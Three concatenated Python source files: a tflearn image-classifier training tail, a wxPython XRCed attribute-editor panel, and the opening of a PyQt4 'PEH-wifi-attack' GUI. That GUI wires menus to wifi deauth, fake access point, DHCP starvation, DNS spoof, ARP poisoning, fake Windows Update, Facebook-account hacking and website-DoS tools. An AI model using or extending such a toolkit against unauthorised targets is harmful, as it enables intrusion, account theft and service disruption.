network = fully_connected(network, 512, activation='relu')
# Step 7: Dropout - throw away some data randomly during training to prevent over-fitting
network = dropout(network, 0.5)
# Step 8: Fully-connected layer with two softmax outputs for the binary
# classification (class 0 / class 1). NOTE(review): the original comment
# said "bird" -- left over from the CIFAR-10 tutorial this is based on;
# here the model is saved as a people-classifier.
network = fully_connected(network, 2, activation='softmax')
# Tell tflearn how we want to train the network
network = regression(network, optimizer='adam',
                     loss='categorical_crossentropy',
                     learning_rate=0.001)
# Wrap the network in a model object
model = tflearn.DNN(network, tensorboard_verbose=0, checkpoint_path='people-classifier.tfl.ckpt')
# Train it! We'll do 100 training passes and monitor it as it goes.
model.fit(X, Y, n_epoch=100, shuffle=True, validation_set=(X_test, Y_test),
          show_metric=True, batch_size=96,
          snapshot_epoch=True,
          run_id='people-classifier')
# Save model when training is complete to a file
model.save("people-classifier.tfl")
print("Network trained and saved as people-classifier.tfl!")
| rdjdejong/LerenEnBeslissen-2017 | convNN.py | Python | mit | 2,866 |
# Name: AttributePanel.py
# Purpose: View components for editing attributes
# Author: Roman Rolinsky <rolinsky@mema.ucl.ac.be>
# Created: 17.06.2007
# RCS-ID: $Id: AttributePanel.py 73215 2012-12-19 18:05:05Z RD $
import string
import wx
import wx.lib.buttons as buttons
from globals import *
import params
import component
import undo
import images
labelSize = (100,-1)
# Panel class is the attribute panel containing class name, XRC ID and
# a notebook with particular pages.
class ScrolledPage(wx.ScrolledWindow):
    # Scrolling container that hosts at most one attribute panel at a time.
    def __init__(self, parent):
        wx.ScrolledWindow.__init__(self, parent)
        self.topSizer = wx.BoxSizer(wx.VERTICAL)
        self.SetSizer(self.topSizer)
        self.panel = None
        self.SetScrollRate(5, 5)
    def Reset(self):
        # Destroy the hosted panel, if any.
        if self.panel:
            self.panel.Destroy()
            self.panel = None
    def SetPanel(self, panel):
        # Replace the current panel with `panel` and re-layout.
        self.Reset()
        self.panel = panel
        self.topSizer.Add(panel, 0, wx.ALL | wx.EXPAND, 2)
        self.topSizer.Layout()
        self.SendSizeEvent()
# No highlighting please
class ToggleButton(buttons.GenBitmapToggleButton):
    # Toggle button without focus highlighting: overrides the background
    # brush so borderless buttons blend into the parent window.
    def GetBackgroundBrush(self, dc):
        colBg = self.GetBackgroundColour()
        brush = wx.Brush(colBg, wx.SOLID)
        if self.style & wx.BORDER_NONE:
            myAttr = self.GetDefaultAttributes()
            parAttr = self.GetParent().GetDefaultAttributes()
            myDef = colBg == myAttr.colBg
            parDef = self.GetParent().GetBackgroundColour() == parAttr.colBg
            if myDef and parDef:
                # Both this button and its parent use default colours:
                # use the platform's native dialog background where possible.
                if wx.Platform == "__WXMAC__":
                    brush.MacSetTheme(1) # 1 == kThemeBrushDialogBackgroundActive
                elif wx.Platform == "__WXMSW__":
                    if self.DoEraseBackground(dc):
                        brush = None
            elif myDef and not parDef:
                # Parent has a custom background; inherit it.
                colBg = self.GetParent().GetBackgroundColour()
                brush = wx.Brush(colBg, wx.SOLID)
        return brush
class Panel(wx.Panel):
    '''Attribute panel main class.

    Top-level editor widget: shows the ref/class/name fields for the
    selected XRC node plus a notebook whose pages edit attribute groups
    (attributes, style, extra style, window attributes, implicit
    attributes, generated code).
    '''
    def __init__(self, *args, **kw):
        wx.Panel.__init__(self, *args, **kw)
        # Set common sizes
        params.InitParams(self)
        topSizer = wx.BoxSizer(wx.VERTICAL)
        pinSizer = wx.BoxSizer(wx.HORIZONTAL)
        sizer = wx.FlexGridSizer(cols=2, vgap=1, hgap=5)
        # 'ref' field: only shown for object_ref nodes (see SetData).
        self.labelRef = wx.StaticText(self, -1, 'ref:')
        self.textRef = params.ParamText(self, 'ref', textWidth=200)
        sizer.AddMany([ (self.labelRef, 0, wx.ALIGN_CENTER_VERTICAL),
                        (self.textRef, 0, wx.LEFT, 5) ])
        self.labelClass = wx.StaticText(self, -1, 'class:')
        self.textClass = params.ParamText(self, 'class', textWidth=200)
        sizer.AddMany([ (self.labelClass, 0, wx.ALIGN_CENTER_VERTICAL),
                        (self.textClass, 0, wx.LEFT, 5) ])
        self.labelName = wx.StaticText(self, -1, 'name:')
        self.textName = params.ParamText(self, 'name', textWidth=200)
        sizer.AddMany([ (self.labelName, 0, wx.ALIGN_CENTER_VERTICAL),
                        (self.textName, 0, wx.LEFT, 5) ])
        pinSizer.Add(sizer, 0, wx.ALL, 5)
        pinSizer.Add((0, 0), 1)
        # Pin button: when toggled, SetData keeps the previously selected
        # notebook page across selection changes.
        self.pinButton = ToggleButton(self, bitmap=images.ToolPin.GetBitmap(),
                                      style=wx.BORDER_NONE)
        self.pinButton.SetBitmapSelected(images.ToolPinDown.GetBitmap())
        self.pinButton.SetToggle(g.conf.panelPinState)
        self.pinButton.SetToolTipString('Sticky page selection')
        pinSizer.Add(self.pinButton)
        topSizer.Add(pinSizer, 0, wx.EXPAND)
        self.sizer = sizer
        self.nb = wx.Notebook(self, -1)
        if wx.Platform == '__WXGTK__':
            # Redefine AddPage on GTK to fix when page added is not shown
            _oldAddPage = wx.Notebook.AddPage
            def _newAddPage(self, page, label):
                _oldAddPage(self, page, label)
                page.Show(True)
            wx.Notebook.AddPage = _newAddPage
        # Create scrolled windows for panels
        self.pageA = ScrolledPage(self.nb)
        self.nb.AddPage(self.pageA, 'Attributes')
        # Style page
        self.pageStyle = ScrolledPage(self.nb)
        self.pageStyle.Hide()
        # Extra style page
        self.pageExStyle = ScrolledPage(self.nb)
        self.pageExStyle.Hide()
        # Window attributes page
        self.pageWA = ScrolledPage(self.nb)
        self.pageWA.Hide()
        # Implicit attributes page
        self.pageIA = ScrolledPage(self.nb)
        self.pageIA.Hide()
        # Code page
        self.pageCode = ScrolledPage(self.nb)
        self.pageCode.Hide()
        topSizer.Add(self.nb, 1, wx.EXPAND)
        self.SetSizer(topSizer)
        self.undo = None  # pending undo object
    def SetData(self, container, comp, node):
        '''Populate all pages for the selected XML *node*.

        *comp* is the node's component, *container* its parent component
        (may provide an implicit-attributes page).  Returns the list of
        panels created, one per visible notebook page.
        '''
        oldLabel = self.nb.GetPageText(self.nb.GetSelection())
        self.nb.SetSelection(0)
        # Remove every page except 'Attributes'.
        # NOTE: relies on Python 2's eagerly-evaluated map().
        map(self.nb.RemovePage, range(self.nb.GetPageCount()-1, 0, -1))
        # Don't freeze while removing the pages, but do it
        # after the removes instead. See
        # https://groups.google.com/d/topic/wxpython-users/I8AJgkUCPj8/discussion
        self.Freeze()
        self.container = container
        self.comp = comp
        self.node = node        # main node
        self.refNode = node
        panels = []
        # Class and name
        if node.nodeType == node.COMMENT_NODE:
            self.labelRef.Hide()
            self.textRef.Hide()
            self.labelClass.Hide()
            self.textClass.Hide()
        elif node.tagName == 'object_ref':
            self.labelRef.Show()
            self.textRef.Show()
            self.textRef.SetValue(node.getAttribute('ref'))
            self.labelClass.Hide()
            self.textClass.Hide()
            # 'class' can be present for ref?
            self.textClass.SetValue(node.getAttribute('class'))
        else:
            self.labelRef.Hide()
            self.textRef.Hide()
            if comp.klass != 'root':
                self.labelClass.Show()
                self.textClass.Show()
                subclass = node.getAttribute('subclass')
                if not subclass:
                    self.textClass.SetValue(node.getAttribute('class'))
                else:
                    # Display as "Subclass(BaseClass)".
                    self.textClass.SetValue(subclass + '(%s)' % node.getAttribute('class'))
            else:               # root node
                self.labelClass.Hide()
                self.textClass.Hide()
                self.labelRef.Hide()
                self.textRef.Hide()
        self.labelName.Show(comp.hasName)
        self.textName.Show(comp.hasName)
        if comp.hasName:
            self.textName.SetValue(node.getAttribute('name'))
        self.Layout()           # update after hiding/showing
        panel = AttributePanel(self.pageA, comp.attributes, comp.params, comp.renameDict)
        panels.append(panel)
        self.pageA.SetPanel(panel)
        self.SetValues(panel, node)
        if comp.windowAttributes:
            panel = AttributePanel(self.pageWA, comp.windowAttributes,
                                   rename_dict = params.WARenameDict)
            panels.append(panel)
            self.pageWA.SetPanel(panel)
            self.nb.AddPage(self.pageWA, "Look'n'Feel")
            self.SetValues(panel, node)
        if comp.styles or comp.genericStyles:
            # Create style page
            panel = params.StylePanel(self.pageStyle, comp.styles, comp.genericStyles,
                                      equiv = comp.equivStyles)
            panels.append(panel)
            self.pageStyle.SetPanel(panel)
            self.nb.AddPage(self.pageStyle, 'Style')
            self.SetStyleValues(panel, comp.getAttribute(node, 'style'))
        if comp.exStyles or comp.genericExStyles:
            # Create extra style page
            panel = params.StylePanel(self.pageExStyle, comp.exStyles + comp.genericExStyles,
                                      tag='exstyle', equiv = comp.equivStyles)
            panels.append(panel)
            self.pageExStyle.SetPanel(panel)
            self.nb.AddPage(self.pageExStyle, 'ExStyle')
            self.SetStyleValues(panel, comp.getAttribute(node, 'exstyle'))
        # Additional panel for hidden node
        if container and container.requireImplicit(node) and container.implicitAttributes:
            panel = AttributePanel(self.pageIA,
                                   container.implicitAttributes,
                                   container.implicitParams,
                                   container.implicitRenameDict)
            # The implicit page edits the parent (container) node's data.
            panel.comp = container
            panels.append(panel)
            self.pageIA.SetPanel(panel)
            self.nb.AddPage(self.pageIA, container.implicitPageName)
            self.SetValues(panel, node.parentNode)
        if comp.hasCode:
            # Create code page
            panel = CodePanel(self.pageCode, comp.events)
            panel.node = node
            panels.append(panel)
            self.pageCode.SetPanel(panel)
            self.nb.AddPage(self.pageCode, 'Code')
            self.SetCodeValues(panel, comp.getAttribute(node, 'XRCED'))
        # Select old page if possible and pin is down
        if g.conf.panelPinState:
            for i in range(1, self.nb.GetPageCount()):
                if oldLabel == self.nb.GetPageText(i):
                    self.nb.SetSelection(i)
                    break
        self.Thaw()
        return panels
    def Clear(self):
        '''Reset the panel to its empty (no selection) state.'''
        self.comp = None
        self.nb.SetSelection(0)
        # Remove every page except 'Attributes' (eager Python 2 map()).
        map(self.nb.RemovePage, range(self.nb.GetPageCount()-1, 0, -1))
        self.pageA.Reset()
        self.undo = None
        self.textClass.SetValue('')
        self.labelName.Show(False)
        self.textName.Show(False)
        self.Layout()
    def GetActivePanel(self):
        '''Return the panel hosted by the selected notebook page, or None.'''
        if self.nb.GetSelection() >= 0:
            return self.nb.GetPage(self.nb.GetSelection()).panel
        else:
            return None
    # Set data for a panel
    def SetValues(self, panel, node):
        panel.node = node
        # An implicit-attribute panel carries its own component override.
        if isinstance(panel, AttributePanel) and panel.comp:
            comp = panel.comp
        else:
            comp = self.comp
        for a,w in panel.controls:
            value = comp.getAttribute(node, a)
            w.SetValue(value)
    # Set data for a style panel
    def SetStyleValues(self, panel, style):
        panel.style = style
        panel.node = self.node
        panel.SetValues([('XRCED', style)])
    # Set data for a code panel
    def SetCodeValues(self, panel, data):
        panel.SetValues([('XRCED', data)])
################################################################################
class AttributePanel(wx.Panel):
    '''Particular attribute panel, normally inside a notebook.

    Builds one row (label + editor control) per attribute name.  The
    editor class is looked up in param_dict, then params.paramDict,
    falling back to params.ParamText; rename_dict maps attribute names
    to display labels.
    '''
    def __init__(self, parent, attributes, param_dict={}, rename_dict={}):
        # NOTE(review): mutable default arguments are shared between
        # calls; harmless here only as long as they are never mutated.
        wx.Panel.__init__(self, parent, -1)
        self.controls = []      # list of (attribute name, control) pairs
        self.comp = None # if not None overrides default component
        sizer = wx.FlexGridSizer(len(attributes), 2, 0, 0)
        sizer.AddGrowableCol(1, 0)
        for a in attributes:
            # Find good control class
            paramClass = param_dict.get(a, params.paramDict.get(a, params.ParamText))
            sParam = rename_dict.get(a, a)
            control = paramClass(self, sParam)
            labelPanel = wx.Panel(self, -1)
            labelSizer = wx.BoxSizer()
            labelPanel.SetSizer(labelSizer)
            if control.isCheck: # checkbox-like control
                # Checkbox first, its descriptive label to the right.
                label = wx.StaticText(labelPanel, -1, control.defaultString)
                sizer.AddMany([ (control, 1, wx.EXPAND),
                                (labelPanel, 1, wx.EXPAND) ])
                labelSizer.Add(label, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 2)
            else:
                if sParam:
                    label = wx.StaticText(labelPanel, -1, sParam, size=labelSize)
                    sizer.AddMany([ (labelPanel, 1, wx.EXPAND),
                                    (control, 1, wx.EXPAND) ])
                else:           # for node-level params
                    label = wx.StaticText(labelPanel, -1, '')
                    sizer.Add(control, 1, wx.LEFT, 20)
                labelSizer.Add(label, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 20)
            self.controls.append((a, control))
        self.SetSizerAndFit(sizer)
    def GetValues(self):
        '''Generic method used for creating XML and for other operations.'''
        return [(a,c.GetValue()) for a,c in self.controls]
    def SetValues(self, values):
        '''Generic method used for undo.

        *values* is a list of (attribute, value) pairs in the same order
        as self.controls.
        '''
        for ac,a2v in zip(self.controls, values):
            a,c = ac
            v = a2v[1]
            c.SetValue(v)
################################################################################
class CodePanel(wx.Panel):
    '''Code generation panel.

    Lists the component's standard events as checkboxes, lets the user
    add custom events via comboboxes, and (except for the root) offers
    an "assign variable" flag.  State round-trips through GetValues /
    SetValues as a [('XRCED', data_dict)] pair.
    '''
    ID_BUTTON_DEL = wx.NewId()
    ID_COMBO_EVENT = wx.NewId()
    ART_REMOVE = 'ART_REMOVE'
    def __init__(self, parent, events):
        wx.Panel.__init__(self, parent, -1)
        self.SetFont(g.smallerFont())
        self.events = events    # standard events for this component
        self.checks = []        # (event name, checkbox) pairs
        topSizer = wx.BoxSizer(wx.HORIZONTAL)
        # Events on the left
        leftSizer = wx.BoxSizer(wx.VERTICAL)
        sizer = wx.GridSizer(cols=1, vgap=0, hgap=5)
        label = wx.StaticText(self, label='Events')
        label.SetFont(g.labelFont())
        sizer.Add(label, 0, wx.LEFT, 20)
        for ev in events:
            check = wx.CheckBox(self, label=ev)
            sizer.Add(check)
            self.checks.append((ev, check))
        leftSizer.Add(sizer)
        # Additional comboboxes
        # (btn, combo) rows; the last row is always a blank placeholder.
        self.extra = []
        self.eventSizer = wx.FlexGridSizer(cols=2)
        leftSizer.Add(self.eventSizer)
        topSizer.Add(leftSizer)
        # Right sizer
        rightSizer = wx.BoxSizer(wx.VERTICAL)
        rightSizer.Add((0, 10))
        if g.Presenter.container is not component.Manager.rootComponent:
            self.checkVar = wx.CheckBox(self, label='assign variable')
            rightSizer.Add(self.checkVar, 0, wx.LEFT, 20)
        else:
            self.checkVar = None
        topSizer.Add(rightSizer)
        # Catch all checkbox events
        self.Bind(wx.EVT_CHECKBOX, self.OnCheck)
        self.SetSizerAndFit(topSizer)
        # Extra combos and buttons
        self.Bind(wx.EVT_BUTTON, self.OnButtonDel, id=self.ID_BUTTON_DEL)
        self.Bind(wx.EVT_COMBOBOX, self.OnComboEvent, id=self.ID_COMBO_EVENT)
        self.Bind(wx.EVT_TEXT, self.OnComboText, id=self.ID_COMBO_EVENT)
    def GetValues(self):
        '''Return [('XRCED', data)] with the selected events and the
        assign-variable flag, or [] when nothing is set.'''
        events = []
        for s,check in self.checks:
            if check.IsChecked(): events.append(s)
        # Encode data into a dictionary (pickled elsewhere)
        data = {}
        # Skip the last row: it is the always-empty placeholder combo.
        for btn,combo in self.extra[:-1]:
            events.append(combo.GetValue())
        if events: data['events'] = '|'.join(events)
        if self.checkVar and self.checkVar.GetValue(): data['assign_var'] = '1'
        if data:
            return [('XRCED', data)]
        else:
            return []
    def AddExtraEvent(self, event=''):
        '''Append a delete-button/combobox row for a custom event.'''
        btn = wx.BitmapButton(self, self.ID_BUTTON_DEL,
                              bitmap=wx.ArtProvider.GetBitmap(self.ART_REMOVE, wx.ART_BUTTON),
                              size=(20,20))
        # The blank placeholder row cannot be deleted until it has text.
        if not event: btn.Disable()
        self.eventSizer.Add(btn, 0, wx.ALIGN_CENTRE_VERTICAL)
        combo = wx.ComboBox(self, self.ID_COMBO_EVENT, value=event, choices=component.Component.genericEvents)
        btn.combo = combo
        self.eventSizer.Add(combo)
        self.extra.append((btn, combo))
    def SetValues(self, values):
        '''Restore panel state from [('XRCED', data_dict)].'''
        data = values[0][1]
        events = data.get('events', '').split('|')
        if events == ['']: events = []
        for ev,check in self.checks:
            check.SetValue(ev in events)
        # Add comboboxes for other events
        for ev in events:
            if ev not in self.events:
                self.AddExtraEvent(ev)
        # Empty combo box for adding new events
        self.AddExtraEvent()
        self.Fit()
        self.SetMinSize(self.GetBestSize())
        if self.checkVar:
            self.checkVar.SetValue(int(data.get('assign_var', '0')))
    def OnCheck(self, evt):
        # Any checkbox change marks the presenter as not-applied.
        g.Presenter.setApplied(False)
    def OnButtonDel(self, evt):
        '''Remove the extra-event row whose delete button was clicked.'''
        btn = evt.GetEventObject()
        self.extra.remove((btn, btn.combo))
        btn.combo.Destroy()
        btn.Destroy()
        self.eventSizer.Layout()
        self.Fit()
        self.SetMinSize(self.GetBestSize())
        g.Presenter.setApplied(False)
    # NOTE(review): OnComboText and OnComboEvent have identical bodies;
    # editing or selecting in the placeholder combo enables its delete
    # button and appends a fresh placeholder row.
    def OnComboText(self, evt):
        if evt.GetEventObject() == self.extra[-1][1]:
            self.extra[-1][0].Enable()
            self.AddExtraEvent()
            self.eventSizer.Layout()
            self.Fit()
            self.SetMinSize(self.GetBestSize())
        g.Presenter.setApplied(False)
    def OnComboEvent(self, evt):
        if evt.GetEventObject() == self.extra[-1][1]:
            self.extra[-1][0].Enable()
            self.AddExtraEvent()
            self.eventSizer.Layout()
            self.Fit()
            self.SetMinSize(self.GetBestSize())
        g.Presenter.setApplied(False)
| garrettcap/Bulletproof-Backup | wx/tools/XRCed/AttributePanel.py | Python | gpl-2.0 | 17,379 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from shutil import move
from time import sleep
from platform import dist
from re import search
from os import geteuid,mkdir,system,path,getcwd,chdir,remove,popen
from sys import argv
# When installed system-wide, run from the shared data directory so that
# relative resource paths (rsc/, Core/, Settings/, Modules/) resolve.
if search("/usr/share/",argv[0]):
    chdir("/usr/share/PEH-wifi-attack/")
from Modules.DHCPstarvation import frm_dhcp_Attack,frm_dhcp_main
from Modules.deauth_func import frm_window
from Modules.mac_change_func import frm_mac_generator
from Modules.Probe_func import frm_PMonitor
from Modules.Dns_Func import frm_dnsspoof
from Modules.networksdisc import frm_GetIP
from Modules.AttackUp import frm_update_attack
from Core.check import check_dependencies
from Core.check_privilege import frm_privelege
from Core.Settings import frm_Settings
from Modules.AttackUp import frm_WinSoftUp
from Core.update import frm_Update
from Modules.arps_Posion import frm_Arp_Poison
# Module metadata, shown in the window title and the About dialog.
__author__= "@mh4x0f P0cl4bs Team"
__version__= "0.5.9"
__date_create__= "18/01/2015"
__update__="07/06/2015"
__edited_by__= "h@ck3rb0lt freelancer"
__edited_version__= "0.6.0"
__edited_date__= "25/06/2015"
__edited_update__= "soon as possible"
class frmControl(QMainWindow):
    '''Main application window hosting frm_main as the central widget.'''
    def __init__(self, parent=None):
        super(frmControl, self).__init__(parent)
        self.form_widget = frm_main(self)
        self.setCentralWidget(self.form_widget)
        self.setWindowTitle("PEH-wifi-attack " + __edited_version__)
        self.config = frm_Settings()
        # Apply the theme chosen in the settings XML.
        self.loadtheme(self.config.XmlThemeSelected())
    def loadtheme(self,theme):
        '''Apply the CSS stylesheet named *theme* from the Core directory.

        Fix: the original if/else branched on theme != "theme2" but both
        branches were byte-identical, so the dead duplicate was removed.
        '''
        sshFile=("Core/%s.css"%(theme))
        with open(sshFile,"r") as fh:
            self.setStyleSheet(fh.read())
    def center(self):
        '''Move the window to the centre of the available desktop area.'''
        frameGm = self.frameGeometry()
        centerPoint = QDesktopWidget().availableGeometry().center()
        frameGm.moveCenter(centerPoint)
        self.move(frameGm.topLeft())
class frm_main(QWidget):
    '''Central widget of the PEH-wifi-attack window.

    Builds the menu bar (modules, external tools, PEH-toolkit wrappers),
    the fake-AP attack form, and the log listbox.  Most actions shell
    out via os.system to xterm-wrapped external tools.
    '''
    def __init__(self, parent = None):
        super(frm_main, self).__init__(parent)
        self.create_sys_tray()
        self.Main = QVBoxLayout()
        self.config = frm_Settings()
        self.module_arp = frm_Arp_Poison()
        self.intGUI()
        self.setGeometry(0, 0, 300, 400)
        # Interface name used by the airbase-ng command in start_air.
        self.interface = "wlan"
    def intGUI(self):
        '''Build the menu bar, form widgets and wire all actions.'''
        self.myQMenuBar = QMenuBar(self)
        self.myQMenuBar.setFixedWidth(400)
        Menu_file = self.myQMenuBar.addMenu('&File')
        action_settings = QAction('Settings',self)
        action_settings.setShortcut("Ctrl+X")
        action_settings.triggered.connect(self.show_settings)
        exitAction = QAction('Exit', self)
        exitAction.triggered.connect(exit)
        Menu_file.addAction(exitAction)
        # Tools menu: launchers for external MITM helpers.
        Menu_tools = self.myQMenuBar.addMenu('&Tools')
        etter_conf = QAction("Edit Etter.dns", self)
        etter_conf.setShortcut("Ctrl+U")
        dns_spoof = QAction("Active Dns Spoof", self)
        dns_spoof.setShortcut("Ctrl+D")
        ettercap = QAction("Active Ettercap", self)
        ettercap.setShortcut("Ctrl+E")
        ssl = QAction("Active Sslstrip ", self)
        ssl.setShortcut("Ctrl+S")
        btn_drift = QAction("Active DriftNet", self)
        btn_drift.setShortcut("Ctrl+Y")
        etter_conf.triggered.connect(self.Edit_etter)
        dns_spoof.triggered.connect(self.start_dns)
        ettercap.triggered.connect(self.start_etter)
        ssl.triggered.connect(self.start_ssl)
        btn_drift.triggered.connect(self.start_dift)
        Menu_tools.addAction(etter_conf)
        Menu_tools.addAction(dns_spoof)
        Menu_tools.addAction(ettercap)
        Menu_tools.addAction(ssl)
        Menu_tools.addAction(btn_drift)
        # Modules menu: the built-in attack windows.
        Menu_module = self.myQMenuBar.addMenu("&Modules")
        btn_deauth = QAction("Deauth Attack", self)
        btn_deauth.setShortcut("Ctrl+W")
        btn_probe = QAction("Probe Request",self)
        btn_probe.setShortcut("Ctrl+K")
        btn_mac = QAction("Mac Changer", self)
        btn_mac.setShortcut("Ctrl+M")
        btn_ip_list = QAction("Device FingerPrint", self)
        btn_ip_list.setShortcut("Ctrl+G")
        btn_dhcpStar = QAction("DHCP S. Attack",self)
        btn_dhcpStar.setShortcut("Ctrl+H")
        btn_dns = QAction("DNS Spoof M.",self)
        btn_dns.setShortcut("Ctrl+T")
        btn_winup = QAction("Windows Update Attack ",self)
        btn_winup.setShortcut("Ctrl+N")
        btn_arp = QAction("Arp Posion Attack",self)
        btn_arp.setShortcut("ctrl+Q")
        #icons Modules
        action_settings.setIcon(QIcon("rsc/setting.png"))
        btn_arp.setIcon(QIcon("rsc/arp_.png"))
        btn_winup.setIcon(QIcon("rsc/arp.png"))
        btn_dns.setIcon(QIcon("rsc/dns.png"))
        btn_dhcpStar.setIcon(QIcon("rsc/dhcp.png"))
        btn_ip_list.setIcon(QIcon("rsc/scan.png"))
        btn_mac.setIcon(QIcon("rsc/mac.png"))
        btn_probe.setIcon(QIcon("rsc/probe.png"))
        btn_deauth.setIcon(QIcon("rsc/deauth.png"))
        # icons tools
        dns_spoof.setIcon(QIcon("rsc/dns_spoof.png"))
        ettercap.setIcon(QIcon("rsc/ettercap.png"))
        ssl.setIcon(QIcon("rsc/ssl.png"))
        etter_conf.setIcon(QIcon("rsc/etter.png"))
        btn_drift.setIcon(QIcon("rsc/capture.png"))
        btn_probe.triggered.connect(self.showProbe)
        btn_deauth.triggered.connect(self.newwindow)
        btn_mac.triggered.connect(self.form_mac)
        btn_ip_list.triggered.connect(self.form_list)
        btn_dhcpStar.triggered.connect(self.show_dhcpDOS)
        btn_dns.triggered.connect(self.show_dnsManager)
        btn_winup.triggered.connect(self.show_windows_update)
        btn_arp.triggered.connect(self.show_arp_posion)
        Menu_module.addAction(btn_deauth)
        Menu_module.addAction(btn_probe)
        Menu_module.addAction(btn_mac)
        Menu_module.addAction(btn_ip_list)
        Menu_module.addAction(btn_dhcpStar)
        Menu_module.addAction(btn_dns)
        Menu_module.addAction(btn_winup)
        Menu_module.addAction(btn_arp)
        Menu_module.addAction(action_settings)
        # PEH-toolkit menu: thin wrappers around console scripts.
        Menu_peh_toolkit = self.myQMenuBar.addMenu("&PEH-toolkit")
        btn_tutorial = QAction("PEH-toolkit-Tutorial", self)
        btn_ping = QAction("Start a ping your target", self)
        btn_whois = QAction("Start a whois search",self)
        btn_dork3r = QAction("Dork3r vuln analizer", self)
        btn_sqlmap = QAction("SQLMAP", self)
        btn_hackfacebook = QAction("Hack a facebook account",self)
        btn_wifite = QAction("Hack wpe/wpa wifi",self)
        btn_apf = QAction("Find the admin page control",self)
        btn_nmap = QAction("Launched a scan whit NMAP",self)
        btn_theharvester = QAction("Identify different domain and different emails",self)
        btn_fierce = QAction("Retrieve information about the dns",self)
        btn_footprint = QAction("<<<<Hackerbolt Ultimate Footprint>>>>>",self)
        btn_xerxes = QAction("Shutdown a web site / xerxes tool",self)
        btn_tutorial.triggered.connect(self.start_tutorial)
        btn_ping.triggered.connect(self.start_ping)
        btn_whois.triggered.connect(self.start_whois)
        btn_dork3r.triggered.connect(self.start_dork3r)
        btn_sqlmap.triggered.connect(self.start_sqlmap)
        btn_hackfacebook.triggered.connect(self.start_hackfacebook)
        btn_wifite.triggered.connect(self.start_wifite)
        btn_apf.triggered.connect(self.start_apf)
        btn_nmap.triggered.connect(self.start_nmap)
        btn_theharvester.triggered.connect(self.start_theharvester)
        btn_fierce.triggered.connect(self.start_fierce)
        btn_footprint.triggered.connect(self.start_footprint)
        btn_xerxes.triggered.connect(self.start_xerxes)
        Menu_peh_toolkit.addAction(btn_tutorial)
        Menu_peh_toolkit.addAction(btn_ping)
        Menu_peh_toolkit.addAction(btn_whois)
        Menu_peh_toolkit.addAction(btn_dork3r)
        Menu_peh_toolkit.addAction(btn_sqlmap)
        Menu_peh_toolkit.addAction(btn_hackfacebook)
        Menu_peh_toolkit.addAction(btn_wifite)
        Menu_peh_toolkit.addAction(btn_apf)
        Menu_peh_toolkit.addAction(btn_nmap)
        Menu_peh_toolkit.addAction(btn_theharvester)
        Menu_peh_toolkit.addAction(btn_fierce)
        Menu_peh_toolkit.addAction(btn_footprint)
        Menu_peh_toolkit.addAction(btn_xerxes)
        Menu_extra= self.myQMenuBar.addMenu("&Extra")
        Menu_about = QAction("About",self)
        # NOTE(review): Menu_help is created but never connected nor
        # added to the menu.
        Menu_help = QAction("Help",self)
        Menu_update = QAction("Update",self)
        #icons extra
        Menu_about.setIcon(QIcon("rsc/about.png"))
        Menu_help.setIcon(QIcon("rsc/report.png"))
        Menu_update.setIcon(QIcon("rsc/update.png"))
        Menu_about.triggered.connect(self.about)
        Menu_update.triggered.connect(self.show_update)
        Menu_extra.addAction(Menu_update)
        Menu_extra.addAction(Menu_about)
        # Attack form inputs.
        self.input_gw = QLineEdit(self)
        self.input_AP = QLineEdit(self)
        self.input_canal = QLineEdit(self)
        self.w = QComboBox(self)
        self.mod_import = frm_dhcp_Attack()
        self.config.xmlSettings("local0","ipaddress",str(self.mod_import.get_ip_local(None)),False)
        gw = self.module_arp.get_geteway()
        if gw != None:
            self.config.xmlSettings("local1","gateway",gw[0],False)
        x = self.config.xmlSettings("local1", "gateway",None,False)
        self.input_gw.setText(x)
        # NOTE(review): the following line immediately overwrites the
        # detected gateway with a hard-coded placeholder — confirm intent.
        self.input_gw.setText("192.168.1.0 / dsldevice.lan")
        self.input_AP.setText("Free Wifi fake Network")
        self.input_canal.setText("11")
        # Populate the combo with wlan* interfaces only.
        n = self.mod_import.placa()
        for i,j in enumerate(n):
            if search("wlan", j):
                self.w.addItem(n[i])
        # Unpack the bundled Windows-Update payload on first run.
        if not path.isfile("Modules/Win-Explo/Windows_Update/Settins_WinUpdate.html"):
            system("cp Settings/source.tar.gz Modules/Win-Explo/")
            system('cd Modules/Win-Explo/ && tar -xf source.tar.gz')
            remove("Modules/Win-Explo/source.tar.gz")
        # Locate external tool binaries; self.m holds their presence flags.
        driftnet = popen("which driftnet").read().split("\n")
        ettercap = popen("which ettercap").read().split("\n")
        sslstrip = popen("which sslstrip").read().split("\n")
        xterm = popen("which xterm").read().split("\n")
        # NOTE(review): dhcpd is probed but never used in `lista` below.
        dhcpd = popen("which dhcpd").read().split("\n")
        lista = [ "/usr/sbin/airbase-ng", ettercap[0], sslstrip[0],xterm[0],driftnet[0]]
        self.m = []
        for i in lista:
            self.m.append(path.isfile(i))
        self.form = QFormLayout()
        hLine = QFrame()
        hLine.setFrameStyle(QFrame.HLine)
        hLine.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
        hLine2 = QFrame()
        hLine2.setFrameStyle(QFrame.HLine)
        hLine2.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Expanding)
        vbox = QVBoxLayout()
        vbox.setMargin(5)
        vbox.addStretch(20)
        self.form.addRow(vbox)
        self.logo = QPixmap(getcwd() + "/rsc/logo.jpg")
        self.label_imagem = QLabel()
        self.label_imagem.setPixmap(self.logo)
        self.form.addRow(self.label_imagem)
        self.form.addRow("Gateway/IP:", self.input_gw)
        self.form.addRow("Fake Network Name:", self.input_AP)
        self.form.addRow("Channel:", self.input_canal)
        self.form.addRow("Network Card List:", self.w)
        # grid network adapter fix
        self.btrn_refresh = QPushButton("Refresh")
        self.btrn_refresh.setIcon(QIcon("rsc/refresh.png"))
        self.btrn_refresh.clicked.connect(self.refrash_interface)
        self.grid = QGridLayout()
        self.grid.addWidget(QLabel("Network Adapter:"),0,0)
        self.grid.addWidget(self.w, 0,1)
        self.grid.addWidget(self.btrn_refresh,0,2)
        self.btn_start_attack = QPushButton("Start Attack", self)
        self.btn_start_attack.setIcon(QIcon("rsc/start.png"))
        self.btn_start_attack.setFixedWidth(160)
        self.btn_cancelar = QPushButton("Stop Attack", self)
        self.btn_cancelar.setIcon(QIcon("rsc/Stop.png"))
        self.btn_cancelar.setFixedWidth(165)
        self.btn_cancelar.clicked.connect(self.kill)
        self.btn_start_attack.clicked.connect(self.start_air)
        self.dialogTextBrowser = frm_window(self)
        self.form2 = QFormLayout()
